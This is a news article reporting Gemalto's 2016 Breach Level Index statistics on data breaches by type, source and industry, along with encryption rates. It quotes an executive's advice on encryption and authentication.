“The BLI highlights four major cybercriminal trends over the past year. Hackers are casting a wider net and are using easily-attainable account and identity information as a starting point for high value targets. Clearly, fraudsters are also shifting from attacks targeted at financial organisations to infiltrating large data bases such as entertainment and social media sites. Lastly, fraudsters have been using encryption to make breached data unreadable, then hold it for ransom and decrypting once they are paid”, said Jason Hart, VP and CTO for Data Protection at Gemalto.

Data breaches by type

In 2016, identity theft was the leading type of data breach, accounting for 59% of all data breaches, up by 5% from 2015. The second most prevalent type of breach in 2016 is account access based breaches. While the incidence of this type of data breach decreased by 3%, it made up 54 % of all breached records, which is an increase of 336% from the previous year. This highlights the cybercriminal trend from financial information attacks to bigger databases with large volumes of personally identifiable information. Another notable data point is the nuisance category with an increase of 102% accounting for 18% of all breached records up 1474% since 2015.

Data breaches by source

Malicious outsiders were the leading source of data breaches, accounting for 68% of breaches, up from 13% in 2015. The number of records breached in malicious outsider attacks increased by 286% from 2015. Hacktivist data breaches also increased in 2016 by 31%, but only account for 3% of all breaches that occurred last year.

Data breaches by industry

Across industries, the technology sector had the largest increase in data breaches in 2016. Breaches rose 55%, but only accounted for 11% of all breaches last year. Almost 80% of the breaches in this sector were account access and identity theft related. They also represented 28% of compromised records in 2016, an increase of 278% from 2015.

The healthcare industry accounted for 28% of data breaches, rising 11% compared to 2015. However, the number of compromised data records in healthcare decreased by 75% since 2015. Education saw a 5% decrease in data breaches between 2015 and 2016 and a drop of 78% in compromised data records. Government accounted for 15% of all data breaches in 2016. However the number of compromised data records increased 27% from 2015. Financial services companies accounted for 12% of all data breaches, a 23% decline compared to the previous year.

All industries listed in the ‘Other’ category represented 13% of data breaches and 36% of compromised data records. In this category, the overall number of data breaches decreased by 29%, while the number of compromised records jumped by 300% since 2015. Social media and entertainment industry related data breaches made up the majority.

Last year 4.2% of the total number of breach incidents involved data that had been encrypted in part or in full, compared to 4% in 2015. In some of these instances, the password was encrypted, but other information was left unencrypted. However of the almost 1.4 billion records compromised, lost or stolen in 2016, only 6% were encrypted partially or in full (compared to 2% in 2015).

“Knowing exactly where their data resides and who has access to it will help enterprises outline security strategies based on data categories that make the most sense for their organisations. Encryption and authentication are no longer ‘best practices’ but necessities. This is especially true with new and updated government mandates like the upcoming General Data Protection Regulation (GDPR) in Europe, U.S state-based and APAC country-based breach disclosure laws. But it’s also about protecting your business’ data integrity, so the right decisions can be made based on accurate information, therefore protecting your reputation and your profits.”

from Help Net Security http://ift.tt/2nbO3qA